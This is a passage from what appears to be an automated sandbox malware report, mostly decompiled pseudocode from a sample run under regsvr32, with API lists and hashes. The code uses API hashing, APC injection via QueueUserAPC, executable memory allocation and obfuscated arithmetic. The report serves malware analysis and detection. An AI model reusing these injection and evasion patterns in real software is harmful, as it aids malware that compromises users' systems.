                                											if(_t168 == _t246) {
                                												_t154 = r13d;
                                											} else {
                                												_t154 =  *_t168();
                                											}
                                											E0073908C(0xaade337c, _t168,  *((intOrPtr*)(_t221 + 0x18)));
                                											__eflags = _t168 - _t246;
                                											if(_t168 == _t246) {
                                												_t227 = _t246;
                                											} else {
                                												r8d = _t154;
                                												_t74 = _t215 + 0x10; // 0x10
                                												_t126 = _t74;
                                												 *_t168();
                                												_t227 = _t168;
                                											}
                                											_t192 =  *((intOrPtr*)(_t221 + 0x18));
                                											__eflags = _t227 - _t246;
                                											if(_t227 != _t246) {
                                												E0073908C(0x1c8cff93, _t168, _t192);
                                												__eflags = _t168 - _t246;
                                												if(_t168 == _t246) {
                                													_t98 = r13d;
                                												} else {
                                													_t215 = _t227; // executed
                                													_t98 = QueueUserAPC(??, ??, ??); // executed
                                												}
                                												__eflags = _t98 - r13d;
                                												if(_t98 != r13d) {
                                													goto L76;
                                												} else {
                                													_t192 =  *((intOrPtr*)(_t221 + 0x18));
                                													goto L64;
                                												}
                                											} else {
                                												L64:
                                												E0073908C(0xc06f8334, _t168, _t192);
                                												__eflags = _t168 - _t246;
                                												if(_t168 != _t246) {
                                													goto L17;
                                												}
                                												_t124 = r12d;
                                												goto L73;
                                											}
                                										}
                                									} else {
                                										L51:
                                										_t124 = 2;
                                										goto L74;
                                									}
                                								}
                                								_t124 = 0xb7;
                                							}
                                						}
                                						goto L74;
                                					}
                                					 *_t168 = 0;
                                					E0073908C(0x3d06c463, _t168,  *((intOrPtr*)(_t250 + 0x20)));
                                					__eflags = _t168 - _t224;
                                					if(_t168 == _t224) {
                                						_t124 = r12d;
                                					} else {
                                						_t233 = _t229 + 0x2a8;
                                						_t215 =  *((intOrPtr*)(_t229 + 0x20)) + 0x7410a0;
                                						_t114 = RegOpenKeyW(??, ??, ??); // executed
                                						_t124 = _t114;
                                					}
                                					__eflags = _t124 - _t153;
                                					if(_t124 != _t153) {
                                						L34:
                                						HeapFree();
                                						goto L36;
                                					} else {
                                						while(1) {
                                							E0073908C(0xdf514773, _t168,  *((intOrPtr*)(_t250 + 0x20)));
                                							__eflags = _t168;
                                							if(_t168 == 0) {
                                								_t124 = r12d;
                                							} else {
                                								_t233 = _t229 + 0x30;
                                								r9d = 0x104;
                                								_t113 = RegEnumKeyW(??, ??, ??, ??); // executed
                                								_t124 = _t113;
                                							}
                                							__eflags = _t124;
                                							if(_t124 != 0) {
                                								break;
                                							}
                                							_t215 = _t229 + 0x30;
                                							_t153 = _t153 + 1;
                                							_t112 = E00736644(_t168, _t170, _t246, _t229 + 0x30, _t221, _t233, _t238);
                                							_t124 = _t112;
                                							__eflags = _t112;
                                							if(_t112 == 0) {
                                								continue;
                                							}
                                							break;
                                						}
                                						__eflags = _t124 - 0x103;
                                						if(_t124 == 0x103) {
                                							 *0x73d438 = _t246;
                                							_t124 = 0;
                                							__eflags = 0;
                                						}
                                						E0073908C(0xbba3b4b6, _t168,  *((intOrPtr*)(_t250 + 0x20)));
                                						__eflags = _t168;
                                						if(_t168 != 0) {
                                							RegCloseKey(); // executed
                                						}
                                						__eflags = _t124;
                                						if(_t124 == 0) {
                                							goto L36;
                                						} else {
                                							goto L34;
                                						}
                                					}
                                				} else {
                                					E0073908C(0xc06f8334, _t168,  *((intOrPtr*)(_t221 + 0x18)));
                                					if(_t168 == _t244) {
                                						_t124 = 0x7f;
                                						L73:
                                						if(_t124 == r13d) {
                                							goto L76;
                                						}
                                						L74:
                                						E00736CE4(_t126, _t168, _t170, _t219, _t215, _t221);
                                						goto L76;
                                					}
                                					L17:
                                					_t94 =  *_t168();
                                					L72:
                                					_t124 = _t94;
                                					goto L73;
                                				}
                                			}


                                APIs
                                • GetModuleHandleA.KERNEL32 ref: 0073382B
                                  • Part of subcall function 007340F8: HeapAlloc.KERNEL32 ref: 00734177
                                • HeapAlloc.KERNEL32 ref: 007338D5
                                  • Part of subcall function 0073908C: SetLastError.KERNEL32 ref: 007390C8
                                • HeapAlloc.KERNEL32 ref: 007339A4
                                • RegOpenKeyW.ADVAPI32 ref: 007339F5
                                • RegEnumKeyW.ADVAPI32 ref: 00733A2A
                                • RegCloseKey.KERNELBASE ref: 00733A78
                                • HeapFree.KERNEL32 ref: 00733A86
                                • QueueUserAPC.KERNELBASE ref: 00733C8B
                                Memory Dump Source
                                • Source File: 00000003.00000002.640704180.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
                                Similarity
                                • API ID: Heap$Alloc$CloseEnumErrorFreeHandleLastModuleOpenQueueUser
                                • String ID:
                                • API String ID: 3014043065-0
                                • Opcode ID: 9dbcaf920dd6102fce91019f499f3125efbb6cbe76309c74a1881d9469c61bfb
                                • Instruction ID: ccc663f07ceae9093a48b59e4a48f6a4b4509beec84c5c93e459ca307280f2bb
                                • Opcode Fuzzy Hash: 9dbcaf920dd6102fce91019f499f3125efbb6cbe76309c74a1881d9469c61bfb
                                • Instruction Fuzzy Hash: D1C10365704781D6FE34EB62E4883AAA361F788788F504412DF8E47753DF7CEA998311
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 15%
                                			E007331C0(void* __ebx, void* __ecx, void* __eflags, long long __rbx, intOrPtr* __rcx, long long* __rdx, void* __r8, void* __r9) {
                                				void* __rdi;
                                				void* __rsi;
                                				void* __rbp;
                                				signed int _t70;
                                				signed int _t78;
                                				signed int _t81;
                                				signed short _t104;
                                				void* _t108;
                                				long long* _t127;
                                				long long _t128;
                                				void* _t156;
                                				intOrPtr* _t159;
                                				void* _t164;
                                				long long* _t165;
                                				long long* _t167;
                                				void* _t168;
                                				void* _t169;
                                				long long* _t172;
                                				long long* _t173;
                                				long long* _t183;
                                				void* _t187;
                                				void* _t190;
                                				intOrPtr _t191;
                                
                                				_t128 = __rbx;
                                				 *((long long*)(_t168 + 0x10)) = __rbx;
                                				 *((intOrPtr*)(_t168 + 0x20)) = r9d;
                                				 *(_t168 + 0x18) = r8d;
                                				_push(_t164);
                                				_t169 = _t168 - 0x50;
                                				_t188 =  *0x73d458;
                                				_t162 =  *__rcx;
                                				_t191 =  *0x73d448;
                                				_t127 = __rdx;
                                				_t159 = __rcx;
                                				E00736C34(__ebx, __rbx, __rdx, __rcx,  *__rcx, _t164, __r8, _t190, _t187);
                                				_t81 = 0;
                                				_t165 = _t127;
                                				if(_t127 == _t128) {
                                					L36:
                                					E0073908C(0xc06f8334, _t127,  *((intOrPtr*)(_t188 + 0x18)));
                                					if(_t127 == _t128) {
                                						_t81 = 0x7f;
                                					} else {
                                						_t81 =  *_t127();
                                					}
                                					L39:
                                					return _t81;
                                				}
                                				_t108 =  *((char*)(_t159 + 0x75)) - 6;
                                				_t6 = _t128 + 4; // 0x4
                                				r12d = _t6;
                                				if(_t108 > 0 || _t108 == 0 &&  *((char*)(_t159 + 0x74)) > 2) {
                                					 *((intOrPtr*)(_t169 + 0x90)) = r12d;
                                				} else {
                                					 *((intOrPtr*)(_t169 + 0x90)) = _t81;
                                				}
                                				E0073908C(0x3fe3c8ba, _t127,  *((intOrPtr*)(_t162 + 0x48)));
                                				if(_t127 == _t128) {
                                					_t127 = _t128;
                                				} else {
                                					r9d = 0;
                                					r8d = 0;
                                					 *((intOrPtr*)(_t169 + 0x20)) = _t81;
                                					 *_t127(); // executed
                                				}
                                				_t172 = _t165;
                                				 *((long long*)(_t159 + 0x28)) = _t127;
                                				HeapFree(??, ??, ??);
                                				if( *((intOrPtr*)(_t159 + 0x28)) == _t128) {
                                					goto L36;
                                				} else {
                                					if( *((intOrPtr*)(_t169 + 0xa0)) == _t81) {
                                						L15:
                                						E00736C34(_t81, _t128,  *((intOrPtr*)(_t159 + 8)), _t159, _t162, _t165, _t172);
                                						_t183 = _t127;
                                						if(_t127 == _t128) {
                                							goto L36;
                                						}
                                						 *((intOrPtr*)(_t169 + 0x90)) = 0x100;
                                						if( *((intOrPtr*)(_t169 + 0xb0)) == _t81) {
                                							_t104 = 0x50;
                                						} else {
                                							 *((intOrPtr*)(_t169 + 0x40)) = 0xaa0;
                                							E0073908C(0xe7f09937, _t127,  *((intOrPtr*)(_t162 + 0x48)));
                                							if(_t127 != _t128) {
                                								r9d = 4;
                                								 *_t127();
                                							}
                                							asm("bts dword [esp+0x90], 0x17");
                                							_t104 = 0x1bb;
                                						}
                                						E0073908C(0x7dda0345, _t127,  *((intOrPtr*)(_t162 + 0x48)));
                                						if(_t127 == _t128) {
                                							_t127 = _t128;
                                						} else {
                                							r9d = 0;
                                							r8d = _t104 & 0x0000ffff;
                                							 *_t127();
                                						}
                                						_t173 = _t183;
                                						 *((long long*)(_t159 + 0x30)) = _t127;
                                						HeapFree(??, ??, ??);
                                						if( *((intOrPtr*)(_t159 + 0x30)) == _t128) {
                                							goto L36;
                                						} else {
                                							E00736C34(_t81, _t128,  *((intOrPtr*)(_t159 + 0x10)), _t159, _t162, _t165, _t173);
                                							_t167 = _t127;
                                							if(_t127 == _t128) {
                                								goto L36;
                                							}
                                							E0073908C(0xaa9d9fc1, _t127,  *((intOrPtr*)(_t162 + 0x48)));
                                							if(_t127 == _t128) {
                                								_t127 = _t128;
                                							} else {
                                								_t156 =  !=  ? _t191 + 0x741250 : _t191 + 0x741268;
                                								r9d = 0;
                                								 *((intOrPtr*)(_t169 + 0x30)) =  *((intOrPtr*)(_t169 + 0x90));
                                								 *((long long*)(_t169 + 0x28)) = _t128;
                                								 *((long long*)(_t169 + 0x20)) = _t128;
                                								 *_t127(); // executed
                                							}
                                							 *((long long*)(_t159 + 0x38)) = _t127;
                                							HeapFree(??, ??, ??);
                                							if( *((intOrPtr*)(_t159 + 0x38)) == _t128) {
                                								goto L36;
                                							} else {
                                								 *((intOrPtr*)(_t169 + 0x44)) = 4;
                                								E0073908C(0x677ec78c, _t127,  *((intOrPtr*)(_t162 + 0x48)));
                                								_t48 = _t167 + 0x1b; // 0x1f
                                								r12d = _t48;
                                								if(_t127 == _t128) {
                                									_t70 = _t81;
                                								} else {
                                									_t70 =  *_t127();
                                								}
                                								if(_t70 != _t81) {
                                									asm("bts dword [esp+0x90], 0x8");
                                									E0073908C(0xe7f09937, _t127,  *((intOrPtr*)(_t162 + 0x48)));
                                									if(_t127 != _t128) {
                                										r9d = 4;
                                										 *_t127();
                                									}
                                								}
                                								goto L39;
                                							}
                                						}
                                					}
                                					E0073908C(0xe7f09937, _t127,  *((intOrPtr*)(_t162 + 0x48)));
                                					if(_t127 == _t128) {
                                						_t78 = _t81;
                                					} else {
                                						_t18 = _t169 + 0xa0; // -14
                                						_t172 = _t18;
                                						r9d = r12d;
                                						_t78 =  *_t127();
                                					}
                                					if(_t78 == _t81) {
                                						goto L36;
                                					} else {
                                						goto L15;
                                					}
                                				}
                                 			}

                                APIs
                                  • Part of subcall function 00736C34: HeapAlloc.KERNEL32 ref: 00736C8F
                                • HeapFree.KERNEL32 ref: 0073326E
                                • HeapFree.KERNEL32 ref: 0073335F
                                • HeapFree.KERNEL32 ref: 007333ED
                                Memory Dump Source
                                • Source File: 00000003.00000002.640704180.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
                                Similarity
                                • API ID: Heap$Free$Alloc
                                • String ID:
                                • API String ID: 3901518246-0
                                • Opcode ID: bb3dd621c95c53055fcba926f55aa16ae10003733876a93a6dfeee260ac781c3
                                • Instruction ID: ea1a35c35bdcff21396895b809089af42d5f6bc3e8914cafb346401feb957e76
                                • Opcode Fuzzy Hash: bb3dd621c95c53055fcba926f55aa16ae10003733876a93a6dfeee260ac781c3
                                • Instruction Fuzzy Hash: 577188627086C4D6EB30DFA2E54476AA3A1F7C8B84F48442A9F4E47B06CF7CD6A5C710
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0073908C: SetLastError.KERNEL32 ref: 007390C8
                                • CreateFileW.KERNELBASE ref: 0073A10E
                                • NtQueryDirectoryFile.NTDLL ref: 0073A1A5
                                Memory Dump Source
                                • Source File: 00000003.00000002.640704180.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
                                Similarity
                                • API ID: File$CreateDirectoryErrorLastQuery
                                • String ID:
                                • API String ID: 2967190759-0
                                • Opcode ID: f814dd8b6d3da2fcbfd4e7d7d81ec7b5df8dd2866cc2a168341a68cf2791420f
                                • Instruction ID: 8fec7255669c6b8031d2958a8ed9f48852ad5c396a9c77c11ed5cc23f3175e61
                                • Opcode Fuzzy Hash: f814dd8b6d3da2fcbfd4e7d7d81ec7b5df8dd2866cc2a168341a68cf2791420f
                                • Instruction Fuzzy Hash: 3241DD723087849AEB248B52E88532AA3A0F7CC7D0F184525EF9D43B8ACF3CD945C711
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 67%
                                			E00739D6C(void* __ebx, void* __ecx, void* __edx, signed int __esi, long long __rbx, long long __rcx, void* __r8, void* __r9, intOrPtr* __r10, void* __r11, void* _a8, signed int _a16, char _a24, char _a32) {
                                				void* _v48;
                                				intOrPtr _v56;
                                				signed long long* _v64;
                                				signed long long _v72;
                                				char _v80;
                                				char _v88;
                                				long long _v96;
                                				signed long long _v104;
                                				void* __rdi;
                                				void* __rsi;
                                				void* __rbp;
                                				void* _t68;
                                				signed int _t71;
                                				void* _t72;
                                				void* _t79;
                                				signed int _t91;
                                				void* _t97;
                                				signed int _t99;
                                				void* _t116;
                                				signed int _t117;
                                				signed int _t119;
                                				signed int _t120;
                                				long long _t147;
                                				signed long long _t148;
                                				long long _t151;
                                				void* _t155;
                                				void* _t185;
                                				long long _t187;
                                				void* _t190;
                                				long long _t192;
                                				signed short* _t196;
                                				signed int* _t198;
                                				char* _t203;
                                				void* _t217;
                                				void* _t218;
                                				void* _t220;
                                				intOrPtr _t221;
                                
                                				_t217 = __r11;
                                				_t216 = __r10;
                                				_t119 = __esi;
                                				_t97 = __ebx;
                                				_t147 = _t192;
                                				 *((long long*)(_t147 + 8)) = __rbx;
                                				_push(_t190);
                                				_push(_t187);
                                				_push(_t185);
                                				_t221 =  *0x73d458;
                                				r12d =  *0x73d450;
                                				 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0x00000000;
                                				_t151 = __rcx;
                                				_t155 = _t147 - 0x40;
                                				_t68 = E007388C8(__ecx, __rcx, _t155, _t185, _t187, _t190, __r10, _t220, _t218); // executed
                                				_t116 = _t68;
                                				if(_t68 != 0) {
                                					L39:
                                					asm("lock inc ecx");
                                					return _t116;
                                				} else {
                                					_t196 =  *((intOrPtr*)(_t151 + 0x40));
                                					r9d = _t196[1] & 0x0000ffff;
                                					_t99 =  *_t196 & 0x0000ffff;
                                					_t71 = r12d ^ 0xe49a1e6d;
                                					if(_t155 <= __r9 + 8) {
                                						_t119 = 0;
                                						__eflags = 0;
                                					} else {
                                						_t187 = __r9 +  &(_t196[4]);
                                						if(_t71 != 0) {
                                							E00734D70(_t71, _t187);
                                							_t187 = _t147;
                                						}
                                					}
                                					_t124 = _t187;
                                					if(_t187 == 0) {
                                						L38:
                                						L0073A568();
                                						goto L39;
                                					}
                                					_t181 = _v64;
                                					_t13 = _t151 + 0xc0; // 0xc0
                                					_v96 = _t187;
                                					_v104 = _v104 & 0x00000000;
                                					_t72 = E007384E8(_t99, _t124, _t147, _t151, _t13, _v64, _t187, _t190,  *((intOrPtr*)(_t151 + 0x30)),  *((intOrPtr*)(_t151 + 0x38)));
                                					_t116 = _t72;
                                					if(_t72 != 0) {
                                						goto L38;
                                					}
                                					_t148 =  *((intOrPtr*)(_t151 + 0x28));
                                					_t198 =  &_v80;
                                					_v72 = _t148;
                                					if(E007391C8(_t99, r12d ^ 0x61f25585, _t148, _t151, _t187, _t181, _t185, _t187, _t198,  &_a24, _t217) != 0) {
                                						L10:
                                						_t117 = 0;
                                						__eflags = 0;
                                						_a16 = 0;
                                						L11:
                                						E0073908C(0xab05e147, _t148,  *((intOrPtr*)(_t221 + 0x18)));
                                						if(_t148 == 0) {
                                							_t116 = 0x7f;
                                						} else {
                                							r8d = 0;
                                							_t181 =  &_v72;
                                							_t27 = _t198 + 1; // 0x1
                                							_t99 = _t27;
                                							r9d = _t117 * 0x3e8;
                                							_t116 =  *_t148();
                                						}
                                						if(_t116 == 0x102) {
                                							 *(_t151 + 0x64) = 0x3e8;
                                							if(E007391C8(_t99, r12d ^ 0x64d094d6, _t148, _t151, _t187, _t181, _t185, _t187,  &_v80,  &_a24, _t217) == 0) {
                                								_v104 = _v104 & 0x00000000;
                                								_t181 = 0x7334a4;
                                								r9d = 0;
                                								E007314B8(_t97, _t99, _t148, _t151, _t151, 0x7334a4, _t187, _v80,  &_a24);
                                							}
                                							if(E007391C8(_t99, r12d ^ 0xdd4632ba, _t148, _t151, _t187, _t181, _t185, _t187,  &_v80,  &_a24, _t217) == 0 && E0073672C(_v80, _t181,  &_a16) != 0) {
                                								_t91 = _a16;
                                								if(_t91 != 0) {
                                									 *(_t151 + 0x64) = _t91 * 0x3e8;
                                								}
                                							}
                                							if(E007391C8(_t99, r12d ^ 0x705ce798, _t148, _t151, _t187, _t181, _t185, _t187,  &_v80,  &_a24, _t217) != 0 || E0073672C(_v80, _t181,  &_a16) == 0) {
                                								_t120 = 0;
                                								__eflags = 0;
                                								_a16 = 0;
                                							} else {
                                								_t120 = _a16;
                                							}
                                							r12d = r12d ^ 0xe5c7ba87;
                                							_t215 =  &_a24;
                                							_t110 = r12d;
                                							if(E007391C8(_t99, r12d, _t148, _t151, _t187, _t181, _t185, _t187,  &_v80,  &_a24, _t217) == 0) {
                                								_t110 = 0;
                                								if(E0073672C(_v80, _t181,  &_a32) != 0) {
                                									_t110 = 0x9c66d81c;
                                									E0073908C(0x9c66d81c, _t148,  *((intOrPtr*)(_t221 + 0x18)));
                                									if(_t148 != 0) {
                                										 *_t148();
                                									}
                                									 *((intOrPtr*)(_t151 + 0x60)) = _a32;
                                									 *((long long*)(_t151 + 0x58)) = _t148 * 0x23c34600 + _v56;
                                								}
                                							}
                                							do {
                                								_t203 =  &_v88;
                                								_t79 = E00732DC4(_t97, _t110, _t120, _t151,  &_v48, _t203, _t215); // executed
                                								if(_t79 == 0) {
                                									r8d = _v88;
                                									E00737258(_t119, _t151, _t151, _v48, _t216);
                                								}
                                								_t110 = 0xab05e147;
                                								E0073908C(0xab05e147, _t148,  *((intOrPtr*)(_t221 + 0x18)));
                                								if(_t148 == 0) {
                                									_t116 = 0x7f;
                                								} else {
                                									r8d = 0;
                                									r9d = _t120;
                                									_t63 = _t203 + 1; // 0x1
                                									_t99 = _t63;
                                									r9d = r9d * 0x3e8;
                                									_t116 =  *_t148();
                                								}
                                							} while (_t116 != 0);
                                							_t189 =  *((intOrPtr*)(_t151 + 0x50));
                                							if( *((intOrPtr*)(_t151 + 0x50)) != 0) {
                                								E00732874(_t97, _t99,  *((intOrPtr*)( *0x73d458 + 8)), _t189, _t185, _t189);
                                								HeapFree(??, ??, ??);
                                							}
                                						}
                                						goto L38;
                                					}
                                					_t198 =  &_a16;
                                					if(E0073672C(_v80, _t181, _t198) == 0) {
                                						goto L10;
                                					} else {
                                						_t117 = _a16;
                                						goto L11;
                                					}
                                				}
                                 			}

                                APIs
                                  • Part of subcall function 007388C8: HeapAlloc.KERNEL32 ref: 00738910
                                  • Part of subcall function 007388C8: HeapAlloc.KERNEL32 ref: 00738956
                                • HeapFree.KERNEL32 ref: 0073A07E
                                Memory Dump Source
                                • Source File: 00000003.00000002.640704180.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
                                Similarity
                                • API ID: Heap$Alloc$Free
                                • String ID:
                                • API String ID: 1549400367-0
                                • Opcode ID: 8cda5ef62eee2583e1016891d8b3408c524cec5b4a551b585b2903ac7aa30cdf
                                • Instruction ID: 8ab0dde5a333ff357a7e880d8937a93a0f40a52dc3a3d75a7ce1e5954519cda4
                                • Opcode Fuzzy Hash: 8cda5ef62eee2583e1016891d8b3408c524cec5b4a551b585b2903ac7aa30cdf
                                • Instruction Fuzzy Hash: AA81C06230478682FB64DF62E44539EA766F7C5B94F444012EE8E87B1AEF7CC946C740
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 63%
                                			E00007FFC7FFC130E6D50(void* __ecx, void* __rax, long long __rcx, signed int __rdx, signed int __rsi, void* __r8) {
                                				void* __rbx;
                                				void* __r13;
                                				void* _t105;
                                				signed int _t112;
                                				signed int _t127;
                                				signed int _t133;
                                				signed int _t134;
                                				signed int _t142;
                                				signed int _t147;
                                				long long _t149;
                                				signed long long _t151;
                                				signed long long _t152;
                                				signed long long _t153;
                                				signed int _t158;
                                				signed long long _t159;
                                				signed int _t166;
                                				void* _t169;
                                				signed long long _t173;
                                				signed long long _t179;
                                				signed long long _t181;
                                				signed long long _t186;
                                				signed long long _t188;
                                				signed long long _t192;
                                				signed long long _t196;
                                				void* _t200;
                                				void* _t201;
                                				void* _t205;
                                				signed int* _t206;
                                				void* _t207;
                                				void* _t210;
                                				long _t212;
                                				void* _t215;
                                
                                				_t203 = __r8;
                                				 *((long long*)(_t200 + 0x10)) = __rdx;
                                				 *((long long*)(_t200 + 8)) = __rcx;
                                				_push(_t210);
                                				_t201 = _t200 - 0x90;
                                				_t147 =  *(_t201 + 0x100);
                                				_t158 = __rcx + 0x114f;
                                				_t196 =  *(_t201 + 0x130);
                                				_t166 =  *(_t201 + 0x110);
                                				r11d = r9d;
                                				_t186 =  *(_t201 + 0xf0);
                                				r10d = _t147 - 0x16de;
                                				 *(_t201 + 0xe8) = _t158;
                                				r13d = _t147 - 0x37e1;
                                				 *(_t201 + 0x130) = r10d;
                                				r15d = _t186 - 0x23f6;
                                				 *(_t201 + 0x80) = _t196 + 0x17b;
                                				r8d = _t215 + 0x3a59;
                                				r12d = _t166 - 0x165d;
                                				 *(_t201 + 0x100) = r12d;
                                				r9d = _t166 - 0x1351;
                                				if (_t105 - r8d >= 0) goto 0x130e6e2c;
                                				_t149 =  *((intOrPtr*)(__rdx + 0xd0));
                                				r8d = 0x3000;
                                				r9d = 0x40;
                                				_t179 =  *((intOrPtr*)(_t149 + 0x50)) + 0x00000fff & 0xfffff000;
                                				 *(__rdx + 0x190) = _t127;
                                				VirtualAlloc(_t215, _t212); // executed
                                				 *((long long*)(__rdx + 0xc0)) = _t149;
                                				goto 0x130e710b;
                                				r10d =  *__rdx;
                                				_t159 = _t158 - 0x38e9;
                                				r8d =  *(__rdx + 0x140);
                                				r10d = r10d | _t127;
                                				r8d = r8d +  *(__rdx + 0x1b0);
                                				r8d = r8d ^ 0x00002598;
                                				r10d = r10d +  *__rdx;
                                				_t151 = _t158 - 0x0000145b ^ 0x00003a59;
                                				 *(_t201 + 0x50) = _t151;
                                				 *((long long*)(_t201 + 0xe0)) = __rsi;
                                				_t192 = __rsi ^ _t179;
                                				r11d = r9d;
                                				r11d = r11d -  *((intOrPtr*)(__rdx + 0x60));
                                				_t169 = __rsi + 0x170;
                                				r11d = r11d + 0x38e9;
                                				r9d = r15d;
                                				 *(_t201 + 0x48) = _t179;
                                				r9d = r9d & _t142;
                                				 *(_t201 + 0x40) = r8d;
                                				 *(_t201 + 0x38) = r10d;
                                				r8d = _t134 |  *(__rdx + 0x48);
                                				 *(_t201 + 0x30) = r11d;
                                				 *(_t201 + 0x28) = _t159;
                                				 *(_t201 + 0x20) = _t192;
                                				E00007FFC7FFC130E2A70(_t159, _t169, __rdx, __r8, _t207);
                                				r9d = _t215 - 0x3666;
                                				r9d = r9d ^ 0x000037e1;
                                				r10d =  *(__rdx + 0x150);
                                				r10d = r10d + 0x343a;
                                				r11d =  *(__rdx + 0x120);
                                				r11d = r11d ^ 0x00001f2c;
                                				 *(_t201 + 0xf0) = _t151;
                                				r13d = r13d - r12d;
                                				_t188 = _t186 + 0x00000d93 ^ 0x00002598;
                                				_t181 = __rdx & 0x0000228c;
                                				_t152 = _t151 & 0x0000228c;
                                				r8d = (_t196 ^ 0x000030d5) - 0x37e1;
                                				 *(_t201 + 0x48) = _t152;
                                				 *(_t201 + 0x40) = __rdx;
                                				 *(_t201 + 0x38) = r10d;
                                				 *(_t201 + 0x30) = r11d;
                                				 *(_t201 + 0x28) = _t159 ^ _t196;
                                				 *(_t201 + 0x20) = _t188;
                                				_t112 = E00007FFC7FFC130F98F0(r13d, _t152, _t181, _t203, _t205, _t210);
                                				_t133 =  *(__rdx + 0x120);
                                				r12d = _t112;
                                				r15d =  *(__rdx + 0xc8);
                                				r15d = r15d ^ _t133;
                                				r13d =  *(__rdx + 0x1b0);
                                				_t206 =  *((intOrPtr*)(_t201 + 0xd8));
                                				r14d =  *(__rdx + 0x150);
                                				r14d = r14d |  *(__rdx + 0x188);
                                				r8d =  *_t206;
                                				r8d = r8d + _t206[0x38];
                                				r11d = _t206[0x1e];
                                				r10d = _t206[0x8a];
                                				r10d = r10d - 0x3666;
                                				_t153 = _t152 ^  *(_t201 + 0x80);
                                				r8d = r8d | _t133;
                                				r13d = r13d | 0x000027b2;
                                				r13d = r13d - _t206[0x24];
                                				r11d = r11d |  *(_t201 + 0x80);
                                				r11d = r11d +  *(_t201 + 0xe8);
                                				 *(_t201 + 0x78) = r15d;
                                				 *(_t201 + 0x70) = r14d;
                                				 *((long long*)(_t201 + 0x68)) = _t169 + _t181;
                                				 *((long long*)(_t201 + 0x60)) = _t192 + 0x38e9;
                                				_t173 = ( *(_t201 + 0xd0) -  *(_t201 + 0xf0) + 0xea2) * _t188;
                                				 *(_t201 + 0xf0) = _t153;
                                				 *(_t201 + 0xd0) = _t173;
                                				r9d =  *(_t201 + 0x110);
                                				r12d =  *(_t201 + 0x100);
                                				r9d = r9d + 0xffffe749;
                                				r9d = r9d ^  *(__rdx + 0x130);
                                				r12d = r12d | 0x000038e9;
                                				r9d = r9d |  *( *((intOrPtr*)(_t201 + 0xd8)) + 0x100);
                                				 *((long long*)(_t201 + 0x58)) =  *(_t201 + 0xd0);
                                				 *(_t201 + 0x50) =  *(_t201 + 0x130) + _t173 ^ 0x0000343a;
                                				 *(_t201 + 0x48) = r11d;
                                				 *(_t201 + 0x40) = r10d;
                                				r10d =  *(_t201 + 0xf0);
                                				 *(_t201 + 0x38) = r10d;
                                				 *(_t201 + 0x30) = r13d;
                                				 *(_t201 + 0x28) = r8d;
                                				 *(_t201 + 0x20) = _t153 ^  *(_t201 + 0x130);
                                				return E00007FFC7FFC130FA750(_t153 ^  *(_t201 + 0x130), _t173 &  *(_t201 + 0xe8), _t173 &  *(_t201 + 0xe8),  *((intOrPtr*)(_t201 + 0xd8)), _t206);
                                			}

                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 701046bcfc664d896e7e8cbef1e18b682c6a552b8b4cc95593f1301737a4187d
                                • Instruction ID: 6a52ef302f8d0ada13a76ef666c9e59bc3bdeddbfdec42d790b2c44045eca038
                                • Opcode Fuzzy Hash: 701046bcfc664d896e7e8cbef1e18b682c6a552b8b4cc95593f1301737a4187d
                                • Instruction Fuzzy Hash: BE914AB36186D48BD325CF19E448B9EBBA4F788788F114129EF8957B58C738EA51CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                • Executed
                                • Not Executed
